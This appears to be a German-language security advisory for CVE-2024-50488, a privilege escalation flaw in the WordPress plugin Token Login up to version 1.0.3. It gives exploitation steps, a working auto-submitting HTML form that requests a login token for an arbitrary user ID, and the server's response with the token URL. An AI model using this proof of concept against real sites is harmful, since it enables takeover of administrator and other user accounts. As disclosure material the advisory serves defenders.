
Token Login <= 1.0.3 - Authentifizierte (Abonnent+) Privilegienerweiterung
Token Login <= 1.0.3 - Privilege Escalation für authentifizierte Benutzer (Subscriber+)
Das Plugin „Auto Login using a secure tokenized url. Role wise login restriction.“ für WordPress ist in allen Versionen bis einschließlich 1.0.3 anfällig für Privilege Escalation durch Account-Übernahme. Dies liegt daran, dass das Plugin nicht ordnungsgemäß überprüft, ob ein Benutzer die Berechtigung hat, Login-Tokens für andere Benutzer zu generieren. Dadurch ist es authentifizierten Angreifern mit Subscriber-Zugriff und höher möglich, sich als andere Benutzer, einschließlich Administratoren, anzumelden.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
Eingeloggt dieses HTML-Formular absenden. Ändere die URL auf die WordPress-Seite, bei der du angemeldet bist. Ändere die ID auf den Benutzer, für den du den Token generieren möchtest. Kopiere die URL und du kannst dich als dieser Benutzer anmelden.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Antwort
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}